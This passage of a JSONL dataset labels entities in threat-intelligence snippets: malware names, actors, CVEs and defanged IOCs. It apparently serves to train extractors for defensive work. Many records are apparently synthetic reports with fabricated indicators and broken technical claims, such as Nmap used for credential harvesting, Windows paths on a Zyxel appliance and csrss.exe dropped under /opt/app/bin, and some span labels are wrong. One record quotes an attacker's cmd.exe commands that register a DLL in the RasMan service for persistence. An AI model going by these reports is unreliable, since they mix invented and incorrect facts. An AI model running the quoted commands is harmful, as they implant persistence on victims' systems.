0b462a466b69be91392bd2f0a7caa06e5145bb13": [[578, 618]]}, "info": {"id": "synth_v2_01543", "source": "defanged_augment"}}
{"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com[ . ]mxi[ . ]videoplay ) .", "spans": {"Malware: Ploutus": [[55, 62]], "Indicator: MXI Player": [[220, 230]], "Indicator: com.mxi.videoplay": [[360, 385]]}, "info": {"id": "cyberner_stix_train_004633", "source": "defanged_augment"}}
{"text": "Despite the FBI takedown in August 2023, QakBot (also known as Qbot and Pinkslipbot) resurfaced in late 2024 with updated infrastructure. The new variant with SHA256 hash 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b communicates with C2 servers at 203[.]0[.]113[.]42, 198[.]51[.]100[.]73, and 192 [ . ] 0 [ . ] 2 [ . ] 156. The malware is delivered through malicious OneNote files that execute PowerShell commands to download the payload from hxxp://203[.]0[.]113[.]42/updates/kb5034441.dll. QakBot creates persistence via a scheduled task and drops its main DLL to C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll. The malware performs process injection into wermgr.exe and explorer.exe for evasion. Additional C2 domains include update-service-ms[ . ]com and cdn-office365[ . ]net. Associated email addresses used in phishing: invoice@update-service-ms[.]com and admin@cdn-office365[ . ]net.", "spans": {"Malware: QakBot": [[41, 47], [512, 518]], "Malware: Qbot": [[63, 67]], "Malware: Pinkslipbot": [[72, 83]], "Organization: FBI": [[12, 15]], "Indicator: 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b": [[171, 235]], "Indicator: 203.0.113.42": [[268, 286]], "Indicator: 198.51.100.73": [[288, 307]], "Indicator: 192.0.2.156": [[313, 342]], "System: OneNote": [[387, 394]], "Indicator: hxxp://203.0.113.42/updates/kb5034441.dll": [[463, 510]], "System: wermgr.exe": [[682, 692]], "System: explorer.exe": [[697, 709]], "Indicator: update-service-ms.com": [[753, 778]], "Indicator: cdn-office365.net": [[783, 804]], "Indicator: invoice@update-service-ms.com": [[851, 882]], "Indicator: admin@cdn-office365.net": [[887, 914]]}, "info": {"id": "malware_00018", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Meduza Stealer Campaign:\nNetwork Indicators:\n- 172[.]198[.]228[.]170\n- 172 [ . ] 131 [ . ] 196 [ . ] 209\n- 192[.]171[.]127[.]24\n- storagegateway[ . ]site\n- logincloud[.]cc\nURLs:\n- hxxps://portal-cache[.]link/panel/index.html\n- hxxp://synccache[.]site/callback\nEmail Senders:\n- account@secure-verify[.]net\n- alert@urgent-notice[ . ]online\nFile Indicators:\n- MD5: 29a013da185ffed3cdc81f49d9f45281\n- SHA256: 8c48ea123505cf95c2dd8af118eda22c1957924148290661245a10abbbc56c65\n- Drop path: C:\\Users\\admin\\Downloads\\payload.bin", "spans": {"Malware: Meduza Stealer": [[15, 29]], "Indicator: 172.198.228.170": [[62, 83]], "Indicator: 172.131.196.209": [[86, 119]], "Indicator: 192.171.127.24": [[122, 142]], "Indicator: storagegateway.site": [[145, 168]], "Indicator: logincloud.cc": [[171, 186]], "Indicator: hxxps://portal-cache.link/panel/index.html": [[195, 239]], "Indicator: http://synccache.site/callback": [[242, 274]], "Indicator: account@secure-verify.net": [[292, 319]], "Indicator: alert@urgent-notice.online": [[322, 352]], "Indicator: 29a013da185ffed3cdc81f49d9f45281": [[377, 409]], "Indicator: 8c48ea123505cf95c2dd8af118eda22c1957924148290661245a10abbbc56c65": [[420, 484]]}, "info": {"id": "synth_v2_01362", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: IcedID (SHA256: 4bac1f77ec283db1640c35398e9b367869b9ae3b7608bcd4922de1031634bf98). Upon execution on Zyxel USG, the sample creates C:\\Users\\Public\\Documents\\implant.so and injects into legitimate processes. Network analysis shows beaconing to 172[.]63[.]77[.]53 every 60 seconds and DNS queries to loginsync[.]link. The second stage was fetched from hxxps://updateauth[.]io/panel/index.html and written to /dev/shm/helper.sh. The payload uses PowerView-style techniques for defense evasion. A secondary hash (MD5: 73419d10cab2520407d7090ec183bd2b) was extracted from the unpacked payload.", "spans": {"Malware: IcedID": [[25, 31]], "Indicator: 4bac1f77ec283db1640c35398e9b367869b9ae3b7608bcd4922de1031634bf98": [[41, 105]], "System: Zyxel USG": [[126, 135]], "Indicator: 172.63.77.53": [[268, 286]], "Indicator: loginsync.link": [[323, 339]], "Indicator: https://updateauth.io/panel/index.html": [[375, 415]], "Indicator: 73419d10cab2520407d7090ec183bd2b": [[539, 571]]}, "info": {"id": "synth_v2_00506", "source": "defanged_augment"}}
{"text": "The server sends back encoded json containing URL , class name and method name . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . The archive contains an [.]exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"Vulnerability: CVE-2017-11882": [[118, 132]], "Vulnerability: (CVE-2017-11882)": [[227, 243]], "Indicator: .exe file": [[290, 301]], "Indicator: Microsoft Word file": [[329, 348]]}, "info": {"id": "cyberner_stix_train_006617", "source": "defanged_augment"}}
{"text": "IOC Bulletin - IcedID Campaign:\nNetwork Indicators:\n- 192 [ . ] 123 [ . ] 212 [ . ] 125\n- 128[.]234[.]237[.]117\n- 172 [ . ] 175 [ . ] 233 [ . ] 97\n- mailmail[.]info\n- staticcdn[ . ]xyz\nURLs:\n- hxxps://static-storage[ . ]link/wp-content/uploads/doc.php\n- hxxps://authauth[ . ]dev/download/update.exe\nEmail Senders:\n- service@document-share[ . ]link\n- billing@document-share[.]link\nFile Indicators:\n- MD5: c20ee49afe74aa2ff060cebbabbaca7a\n- SHA1: 8a85ee193e4a86f9675425d2670695d602a1691a\n- Drop path: /opt/app/bin/csrss.exe", "spans": {"Malware: IcedID": [[15, 21]], "Indicator: 192.123.212.125": [[54, 87]], "Indicator: 128.234.237.117": [[90, 111]], "Indicator: 172.175.233.97": [[114, 146]], "Indicator: mailmail.info": [[149, 164]], "Indicator: staticcdn.xyz": [[167, 184]], "Indicator: https://static-storage.link/wp-content/uploads/doc.php": [[193, 251]], "Indicator: hxxps://authauth.dev/download/update.exe": [[254, 298]], "Indicator: service@document-share.link": [[316, 347]], "Indicator: billing@document-share.link": [[350, 379]], "Indicator: c20ee49afe74aa2ff060cebbabbaca7a": [[404, 436]], "Indicator: 8a85ee193e4a86f9675425d2670695d602a1691a": [[445, 485]]}, "info": {"id": "synth_v2_01457", "source": "defanged_augment"}}
{"text": "If the server returns this flag as positive , the app will not trigger the adware payload . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate[ . ]scr .", "spans": {"Organization: Kaspersky": [[92, 101]], "Malware: KONNI": [[253, 258]], "Indicator: RC_Office_Coordination_Associate.scr": [[323, 363]]}, "info": {"id": "cyberner_stix_train_006128", "source": "defanged_augment"}}
{"text": "Github's CodeQL action is provided to run CodeQL-based code scanning on non-GitHub CI/CD systems and requires a GitHub access token to connect to a GitHub repository. The runner and its documentation previously suggested passing the GitHub token as a command-line parameter to the process instead of reading it from a file, standard input, or an environment variable. This approach made the token visible to other processes on the same machine, for example in the output of the `ps` command. If the CI system publicly exposes the output of `ps`, for example by logging the output, then the GitHub access token can be exposed beyond the scope intended. Users of the CodeQL runner on 3rd-party systems, who are passing a GitHub token via the `--github-auth` flag, are affected. This applies to both GitHub[ . ]com and GitHub Enterprise users. Users of the CodeQL Action on GitHub Actions are not affected. The `--github-auth` flag is now considered insecure and deprecated. The undocumented `--external-repository-token` flag has been removed. To securely provide a GitHub access token to the CodeQL runner, users should **do one of the following instead**: Use the `--github-auth-stdin` flag and pass the token on the command line via standard input OR set the `GITHUB_TOKEN` environment variable to contain the token, then call the command without passing in the token. The old flag remains present for backwards compatibility with existing workflows. If the user tries to specify an access token using the `--github-auth` flag, there is a deprecation warning printed to the terminal that directs the user to one of the above options. All CodeQL runner releases codeql-bundle-20210304 onwards contain the patches. We recommend updating to a recent version of the CodeQL runner, storing a token in your CI system's secret storage mechanism, and passing the token to the CodeQL runner using `--github-auth-stdin` or the `GITHUB_TOKEN` environment variable. If still using the old flag, ensure that process output, such as from `ps`, is not persisted in CI logs.", "spans": {"Indicator: GitHub.com": [[797, 811]], "Organization: GitHub": [[76, 82], [112, 118], [148, 154], [233, 239], [590, 596], [719, 725], [816, 822], [871, 877], [1064, 1070]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-32638"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 73 [ . ] 177 [ . ] 206 [ . ] 243, the Qualys IR team identified WarmCookie running as C:\\Windows\\Tasks\\sam.hive. The threat actor, believed to be Diamond Sleet, used Nmap for credential harvesting and Mimikatz for lateral movement. Exfiltrated data was sent to portal-data[.]xyz and proxy-data[.]io. The initial dropper (MD5: acff08b676873260f3fdfac2ce026b4b) was delivered via a phishing email from billing@identity-verify[.]cc. A second C2 node was observed at 211 [ . ] 6 [ . ] 241 [ . ] 168, with a persistence mechanism writing to /opt/app/bin/chrome_helper.exe.", "spans": {"Indicator: 73.177.206.243": [[64, 96]], "Organization: Qualys": [[102, 108]], "Malware: WarmCookie": [[128, 138]], "Indicator: portal-data.xyz": [[325, 342]], "Indicator: proxy-data.io": [[347, 362]], "Indicator: acff08b676873260f3fdfac2ce026b4b": [[390, 422]], "Indicator: billing@identity-verify.cc": [[464, 492]], "Indicator: 211.6.241.168": [[527, 558]]}, "info": {"id": "synth_v2_00308", "source": "defanged_augment"}}
{"text": "Europol published a threat intelligence report linking Midnight Blizzard to a new campaign exploiting CVE-2020-17296 in Ubuntu 22.04. The attackers deployed Qbot via Hashcat, establishing C2 communication with 163 [ . ] 183 [ . ] 32 [ . ] 204 and storagebackup[ . ]tech. A secondary payload was downloaded from hxxps://cache-proxy[ . ]link/admin/config. The malware binary (SHA256: 5ab115bd718dd63abb977e65564b14729ceca6875aae2a98d2b49c7f5958fad4) was dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\taskhost.exe. Phishing emails were sent from updates@phishing-domain[.]com targeting enterprise users. A backup C2 server was identified at 56 [ . ] 219 [ . ] 108 [ . ] 127.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2020-17296": [[102, 116]], "System: Ubuntu 22.04": [[120, 132]], "Malware: Qbot": [[157, 161]], "Indicator: 163.183.32.204": [[210, 242]], "Indicator: storagebackup.tech": [[247, 269]], "Indicator: https://cache-proxy.link/admin/config": [[311, 352]], "Indicator: 5ab115bd718dd63abb977e65564b14729ceca6875aae2a98d2b49c7f5958fad4": [[382, 446]], "Indicator: updates@phishing-domain.com": [[542, 571]], "Indicator: 56.219.108.127": [[637, 669]]}, "info": {"id": "synth_v2_00099", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Dridex (SHA1: 9361bc61bb02ae5363238069c39f4417113531ec). Upon execution on Microsoft Exchange, the sample creates C:\\Users\\Public\\Documents\\backdoor.elf and injects into legitimate processes. Network analysis shows beaconing to 190[.]26[.]70[.]18 every 60 seconds and DNS queries to cache-update[ . ]net. The second stage was fetched from hxxps://cdnproxy[ . ]link/callback and written to C:\\Users\\admin\\Downloads\\shell.php. The payload uses Certutil-style techniques for defense evasion. A secondary hash (MD5: 51aebf756cf2e3378df7787c31b5345e) was extracted from the unpacked payload.", "spans": {"Malware: Dridex": [[25, 31]], "Indicator: 9361bc61bb02ae5363238069c39f4417113531ec": [[39, 79]], "System: Microsoft Exchange": [[100, 118]], "Indicator: 190.26.70.18": [[253, 271]], "Indicator: cache-update.net": [[308, 328]], "Indicator: https://cdnproxy.link/callback": [[364, 398]], "Indicator: 51aebf756cf2e3378df7787c31b5345e": [[537, 569]]}, "info": {"id": "synth_v2_00628", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed PowerView artifacts at /opt/app/bin/implant.so. Memory dump analysis confirmed execution of Havoc. Registry modifications pointed to persistence via /var/tmp/config.dat. Network forensics identified connections to 31 [ . ] 107 [ . ] 26 [ . ] 210 and cdn-login[ . ]org. Email headers traced the initial vector to contact@mail-service[.]info. File C:\\ProgramData\\helper.sh (MD5: 29bf7c2cc699db507cc1328e51191d88) was identified as the initial dropper. A staging URL hxxp://mail-static[ . ]online/login resolved to 186[.]101[.]140[.]178. Secondary artifact hash: SHA1: 0422fe108e7f404a84f408a4dd90614cb92295e3.", "spans": {"Indicator: 31.107.26.210": [[286, 317]], "Indicator: cdn-login.org": [[322, 339]], "Indicator: contact@mail-service.info": [[384, 411]], "Indicator: 29bf7c2cc699db507cc1328e51191d88": [[449, 481]], "Indicator: hxxp://mail-static.online/login": [[536, 571]], "Indicator: 186.101.140.178": [[584, 605]], "Indicator: 0422fe108e7f404a84f408a4dd90614cb92295e3": [[638, 678]]}, "info": {"id": "synth_v2_01279", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-10212 is a critical CSRF vulnerability affecting MOVEit Transfer. Trend Micro confirmed active exploitation by Charming Kitten in the wild. Exploitation delivers Play (MD5: d7dd3ace432cec804d42f5c033ae6b47) which is dropped to C:\\Windows\\Tasks\\loader.exe. The exploit payload is hosted at hxxps://secure-auth[ . ]online/panel/index.html and communicates to 10[.]204[.]133[.]78 for C2.", "spans": {"Vulnerability: CVE-2026-10212": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: MOVEit Transfer": [[82, 97]], "Organization: Trend Micro": [[99, 110]], "Malware: Play": [[195, 199]], "Indicator: d7dd3ace432cec804d42f5c033ae6b47": [[206, 238]], "Indicator: https://secure-auth.online/panel/index.html": [[322, 369]], "Indicator: 10.204.133.78": [[390, 409]]}, "info": {"id": "synth_v2_00738", "source": "defanged_augment"}}
{"text": "The registrant information for kernel[ . ]ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle[.]org was the same used for mydomain1607[ . ]com , chmail.ir .", "spans": {"Organization: email provider": [[96, 110]], "Indicator: kernel.ws": [[31, 44]], "Indicator: checkgoogle.org": [[135, 152]], "Indicator: mydomain1607.com": [[175, 195]]}, "info": {"id": "dnrti_train_001127", "source": "defanged_augment"}}
{"text": "Below are some of the elements showing the relation . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . The domain , softfix[ . ]co[ . ]kr was registered in 2014 .", "spans": {"Indicator: softfix.co.kr": [[173, 194]]}, "info": {"id": "cyberner_stix_train_000087", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Help Technologies product of Oracle Fusion Middleware (component: Web UIX). Supported versions that are affected are 11[.]1[.]1[.]9.0 and 12[.]2[.]1[.]3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Help Technologies. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Help Technologies, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Help Technologies accessible data as well as unauthorized update, insert or delete access to some of Oracle Help Technologies accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "spans": {"Indicator: 11.1.1.9": [[145, 159]], "Indicator: 12.2.1.3": [[166, 180]], "Organization: Oracle": [[21, 27], [57, 63], [292, 298], [435, 441], [633, 639], [741, 747]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14723"}}
{"text": "A backdoor also known as: Worm.Theals W32/Theals.dam Worm.Theals.Win32.2 Win32.Trojan.WisdomEyes.16070401.9500.9975 Win32/VB.VOMRAe Win.Exploit.DCOM-5 Net-Worm.Win32.Theals.c Virus.Win32.Theals.vvbf Net.Worm.W32!c Virus.Win32.Theals_re.c Win32.Zombie.4214 BehavesLike[.]Win32[.]Virut[.]ch Worm/Theals.i W32/Theals.D Win32.Theals.bd.8704 Net-Worm.Win32.Theals.c Worm/Win32.Theals.C1456665 Virus.Win32.Stealth.c W32/Theals.C!worm.im Win32/Trojan.529", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.ch": [[256, 288]]}, "info": {"id": "cyner2_train_001351", "source": "defanged_augment"}}
{"text": "Blog Post by Cisco Talos: Tracking FIN7's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-33723 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from admin@identity-verify[.]cc delivering Conti. Post-compromise, the attackers deploy RedLine Stealer and use PowerView for reconnaissance. C2 infrastructure includes 68 [ . ] 9 [ . ] 59 [ . ] 13 and backup-portal[ . ]com. A staging server at hxxp://static-cloud[ . ]dev/secure/token hosts additional tooling. Key artifact: C:\\Users\\admin\\Downloads\\config.dat (SHA256: 1563c768f146f70543dc95a83e36c0623fd9de6607697482fd8521b0849f0232).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2025-33723": [[119, 133]], "System: MOVEit Transfer": [[142, 157]], "Indicator: admin@identity-verify.cc": [[233, 259]], "Malware: Conti": [[271, 276]], "Malware: RedLine Stealer": [[316, 331]], "Indicator: 68.9.59.13": [[397, 425]], "Indicator: backup-portal.com": [[430, 451]], "Indicator: hxxp://static-cloud.dev/secure/token": [[473, 513]], "Indicator: 1563c768f146f70543dc95a83e36c0623fd9de6607697482fd8521b0849f0232": [[599, 663]]}, "info": {"id": "synth_v2_01577", "source": "defanged_augment"}}
{"text": "The malicious executables all called out to the same URLs on windowsnewupdates[.]com .", "spans": {"Indicator: windowsnewupdates.com": [[61, 84]]}, "info": {"id": "cyberner_stix_train_007068", "source": "defanged_augment"}}
{"text": "public passive DNS data , in 2017 was used to host the domain server1cs[.]exodus[.]connexxa[.]it .", "spans": {"Indicator: server1cs.exodus.connexxa.it": [[62, 96]]}, "info": {"id": "cyner_train_001313", "source": "defanged_augment"}}
{"text": "This variant of SofacyCarberp was configured to use the following domain as its C2 server : cdnverify[ . ]net .", "spans": {"Malware: SofacyCarberp": [[16, 29]], "Indicator: cdnverify.net": [[92, 109]]}, "info": {"id": "cyberner_stix_train_000370", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Backdoor.Tosct BKDR_WEBRV.A Win32.Trojan.WisdomEyes.16070401.9500.9995 BKDR_WEBRV.A W32/Trojan.FUQN-2612 W32.Trojan.Downloader Trojan.Heur.RP.EBE28B Backdoor:Win32/Tosct.A W32/Dloader[ . ]GQ!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Dloader.GQ": [[202, 216]]}, "info": {"id": "cyner2_train_007154", "source": "defanged_augment"}}
{"text": "CTU researchers have observed BRONZE PRESIDENT batch scripts named doc[.]bat , xls[.]bat , xlsx[ . ]bat , ppt[ . ]bat , pptx[ . ]bat , pdf[ . ]bat , and txt[ . ]bat .", "spans": {"Organization: CTU": [[0, 3]], "Indicator: doc.bat": [[67, 76]], "Indicator: xls.bat": [[79, 88]], "Indicator: xlsx.bat": [[91, 103]], "Indicator: ppt.bat": [[106, 117]], "Indicator: pptx.bat": [[120, 132]], "Indicator: pdf.bat": [[135, 146]], "Indicator: txt.bat": [[153, 164]]}, "info": {"id": "cyberner_stix_train_000214", "source": "defanged_augment"}}
{"text": "A backdoor also known as: BDS/Iroffer.1221.5 Backdoor.Iroffer.AM W32/Iroffer.BC Trojan.Ioffer Backdoor.Win32.Iroffer.1221 Backdoor.Iroffer.1[.]2[.]2[.]1 W32/Iroffer.AM@bd BackDoor.Iroffer.1221 Backdoor.Win32.Iroffer.1221 W32/Iroffer.AM@bd Backdoor.Iroffer.1221.4098 Backdoor:Win32/Iroffer.1_221 Backdoor.Iroffer.1221 Win32/Iroffer.1222 Backdoor.Win32.Iroffer.1221 BackDoor.Iroffer.AD", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: 1.2.2.1": [[139, 152]]}, "info": {"id": "cyner2_train_003001", "source": "defanged_augment"}}
{"text": "async-h1 is an asynchronous HTTP/1.1 parser for Rust (crates[.]io). There is a request smuggling vulnerability in async-h1 before version 2.3.0. This vulnerability affects any webserver that uses async-h1 behind a reverse proxy, including all such Tide applications. If the server does not read the body of a request which is longer than some buffer length, async-h1 will attempt to read a subsequent request from the body content starting at that offset into the body. One way to exploit this vulnerability would be for an adversary to craft a request such that the body contains a request that would not be noticed by a reverse proxy, allowing it to forge forwarded/x-forwarded headers. If an application trusted the authenticity of these headers, it could be misled by the smuggled request. Another potential concern with this vulnerability is that if a reverse proxy is sending multiple http clients' requests along the same keep-alive connection, it would be possible for the smuggled request to specify a long content and capture another user's request in its body. This content could be captured in a post request to an endpoint that allows the content to be subsequently retrieved by the adversary. This has been addressed in async-h1 2.3.0 and previous versions have been yanked.", "spans": {"Indicator: crates.io": [[54, 65]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-26281"}}
{"text": "This led us to additional infrastructure for Zebrocy at 185 [ . ] 25 [ . ] 51 [ . ] 198 and 185 [ . ] 25 [ . ] 50 [ . ] 93 .", "spans": {"Malware: Zebrocy": [[45, 52]], "Indicator: 185.25.51.198": [[56, 87]], "Indicator: 185.25.50.93": [[92, 122]]}, "info": {"id": "cyberner_stix_train_000363", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at C:\\Users\\admin\\Desktop\\dropper.ps1. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via /dev/shm/agent.py. Network forensics identified connections to 96[.]142[.]129[.]17 and cacherelay[.]com. Email headers traced the initial vector to confirm@mail-service[ . ]info. File C:\\Windows\\Temp\\helper.sh (SHA256: 13d365c4532896bac68852e075aa8b99d0165a1279454dbc8816723515da3a5f) was identified as the initial dropper. A staging URL hxxps://storageedge[.]com/secure/token resolved to 172[.]50[.]223[.]101. Secondary artifact hash: SHA256: dc8217c1ff77fad2583557d1499f6c685fb4ad6976693d5a287b83c41cb8a7f4.", "spans": {"Indicator: 96.142.129.17": [[298, 317]], "Indicator: cacherelay.com": [[322, 338]], "Indicator: confirm@mail-service.info": [[383, 412]], "Indicator: 13d365c4532896bac68852e075aa8b99d0165a1279454dbc8816723515da3a5f": [[454, 518]], "Indicator: hxxps://storageedge.com/secure/token": [[573, 611]], "Indicator: 172.50.223.101": [[624, 644]], "Indicator: dc8217c1ff77fad2583557d1499f6c685fb4ad6976693d5a287b83c41cb8a7f4": [[679, 743]]}, "info": {"id": "synth_v2_01251", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nARM: 9359/1: flush: check if the folio is reserved for no-mapping addresses\n\nSince commit a4d5613c4dc6 (\"arm: extend pfn_valid to take into account\nfreed memory map alignment\") changes the semantics of pfn_valid() to check\npresence of the memory map for a PFN. A valid page for an address which\nis reserved but not mapped by the kernel[1], the system crashed during\nsome uio test with the following memory layout:\n\n node   0: [mem 0x00000000c0a00000-0x00000000cc8fffff]\n node   0: [mem 0x00000000d0000000-0x00000000da1fffff]\n the uio layout is：0xc0900000, 0x100000\n\nthe crash backtrace like:\n\n  Unable to handle kernel paging request at virtual address bff00000\n  [...]\n  CPU: 1 PID: 465 Comm: startapp.bin Tainted: G           O      5.10.0 #1\n  Hardware name: Generic DT based system\n  PC is at b15_flush_kern_dcache_area+0x24/0x3c\n  LR is at __sync_icache_dcache+0x6c/0x98\n  [...]\n   (b15_flush_kern_dcache_area) from (__sync_icache_dcache+0x6c/0x98)\n   (__sync_icache_dcache) from (set_pte_at+0x28/0x54)\n   (set_pte_at) from (remap_pfn_range+0x1a0/0x274)\n   (remap_pfn_range) from (uio_mmap+0x184/0x1b8 [uio])\n   (uio_mmap [uio]) from (__mmap_region+0x264/0x5f4)\n   (__mmap_region) from (__do_mmap_mm+0x3ec/0x440)\n   (__do_mmap_mm) from (do_mmap+0x50/0x58)\n   (do_mmap) from (vm_mmap_pgoff+0xfc/0x188)\n   (vm_mmap_pgoff) from (ksys_mmap_pgoff+0xac/0xc4)\n   (ksys_mmap_pgoff) from (ret_fast_syscall+0x0/0x5c)\n  Code: e0801001 e2423001 e1c00003 f57ff04f (ee070f3e)\n  ---[ end trace 09cf0734c3805d52 ]---\n  Kernel panic - not syncing: Fatal exception\n\nSo check if PG_reserved was set to solve this issue.\n\n[1]: hxxps://lore[ . ]kernel[ . ]org/lkml/Zbtdue57RO0QScJM@linux.ibm.com/", "spans": {"Indicator: https://lore.kernel.org/lkml/Zbtdue57RO0QScJM@linux.ibm.com/": [[1681, 1749]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-26947"}}
{"text": "Phishing Campaign Report: INTERPOL identified a large-scale phishing operation. Emails originated from account@mail-service[ . ]info and report@phishing-domain[ . ]com, spoofing legitimate services. Victims were directed to hxxps://cloudbackup[ . ]org/wp-content/uploads/doc.php which hosted a credential harvesting page on edgegateway[.]online. A secondary link hxxp://cache-relay[.]top/gate.php delivered RedLine Stealer (MD5: 3c5a69d7d426552b0b7e8bafa7fdc25d). The malware was saved to C:\\Users\\Public\\Documents\\agent.py and established C2 with 192 [ . ] 217 [ . ] 136 [ . ] 233.", "spans": {"Organization: INTERPOL": [[26, 34]], "Indicator: account@mail-service.info": [[103, 132]], "Indicator: report@phishing-domain.com": [[137, 167]], "Indicator: hxxps://cloudbackup.org/wp-content/uploads/doc.php": [[224, 278]], "Indicator: edgegateway.online": [[324, 344]], "Indicator: http://cache-relay.top/gate.php": [[363, 396]], "Malware: RedLine Stealer": [[407, 422]], "Indicator: 3c5a69d7d426552b0b7e8bafa7fdc25d": [[429, 461]], "Indicator: 192.217.136.233": [[548, 581]]}, "info": {"id": "synth_v2_01016", "source": "defanged_augment"}}
{"text": "cmd[.]exe /c dir rasext[ . ]dll , cmd[ . ]exe /c dir msctfp[ . ]dat , cmd[ . ]exe /c tasklist /svc | findstr RasMan , cmd[.]exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v DllName /d rasext[ . ]dll /f .", "spans": {"Indicator: cmd.exe": [[0, 9], [34, 45], [70, 81], [118, 127]], "Indicator: rasext.dll": [[17, 31], [224, 238]], "Indicator: msctfp.dat": [[53, 67]]}, "info": {"id": "cyberner_stix_train_006732", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at /var/tmp/loader.exe - SHA256: 0a05928a49b4a37219ddd89de71269ec113beed92be59803be9b5f08fcaccd47\nStage 2 loader at C:\\Users\\admin\\Downloads\\loader.exe - SHA1: 72f3968e91bcc323136dd30d85ae887382c487e2\nFinal payload at /etc/cron.d/update.dll - SHA1: 346f216583a1460bb97ebeee0e67f852d9770a45\nExfiltration module - MD5: f6c75c26890bae32e785b3c16b1dda08\nAll stages communicated with 37[.]237[.]169[.]1. Metasploit signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: 0a05928a49b4a37219ddd89de71269ec113beed92be59803be9b5f08fcaccd47": [[92, 156]], "Indicator: 72f3968e91bcc323136dd30d85ae887382c487e2": [[219, 259]], "Indicator: 346f216583a1460bb97ebeee0e67f852d9770a45": [[308, 348]], "Indicator: f6c75c26890bae32e785b3c16b1dda08": [[376, 408]], "Indicator: 37.237.169.1": [[438, 456]]}, "info": {"id": "synth_v2_01899", "source": "defanged_augment"}}
{"text": "Volexity detected a multi-stage attack chain. The initial phishing email from security@account-update[.]xyz contained a link to hxxps://cloudgateway[ . ]top/login. This redirected to hxxps://cache-node[ . ]org/secure/token on relay-backup[.]net. A secondary email from it@account-update[ . ]xyz pointed to hxxp://node-auth[ . ]info/admin/config which delivered SmokeLoader. The final payload callback was hxxp://relaycdn[ . ]org/callback resolving to 83[.]103[.]41[.]49 via cdngateway[.]com.", "spans": {"Organization: Volexity": [[0, 8]], "Indicator: security@account-update.xyz": [[78, 107]], "Indicator: hxxps://cloudgateway.top/login": [[128, 162]], "Indicator: https://cache-node.org/secure/token": [[183, 222]], "Indicator: relay-backup.net": [[226, 244]], "Indicator: it@account-update.xyz": [[269, 294]], "Indicator: http://node-auth.info/admin/config": [[306, 344]], "Malware: SmokeLoader": [[361, 372]], "Indicator: hxxp://relaycdn.org/callback": [[405, 437]], "Indicator: 83.103.41.49": [[451, 469]], "Indicator: cdngateway.com": [[474, 490]]}, "info": {"id": "synth_v2_01717", "source": "defanged_augment"}}
{"text": "ESET Research detected a multi-stage attack chain. The initial phishing email from security@auth-check[.]org contained a link to hxxp://login-portal[ . ]io/assets/js/payload.js. This redirected to hxxp://nodeproxy[ . ]com/collect on portal-login[ . ]online. A secondary email from account@secure-verify[ . ]net pointed to hxxp://authgateway[.]top/panel/index.html which delivered Vidar. The final payload callback was hxxps://edge-backup[.]tech/panel/index.html resolving to 192 [ . ] 238 [ . ] 201 [ . ] 252 via clouddata[.]net.", "spans": {"Organization: ESET Research": [[0, 13]], "Indicator: security@auth-check.org": [[83, 108]], "Indicator: hxxp://login-portal.io/assets/js/payload.js": [[129, 176]], "Indicator: hxxp://nodeproxy.com/collect": [[197, 229]], "Indicator: portal-login.online": [[233, 256]], "Indicator: account@secure-verify.net": [[281, 310]], "Indicator: hxxp://authgateway.top/panel/index.html": [[322, 363]], "Malware: Vidar": [[380, 385]], "Indicator: https://edge-backup.tech/panel/index.html": [[418, 461]], "Indicator: 192.238.201.252": [[475, 508]], "Indicator: clouddata.net": [[513, 528]]}, "info": {"id": "synth_v2_01760", "source": 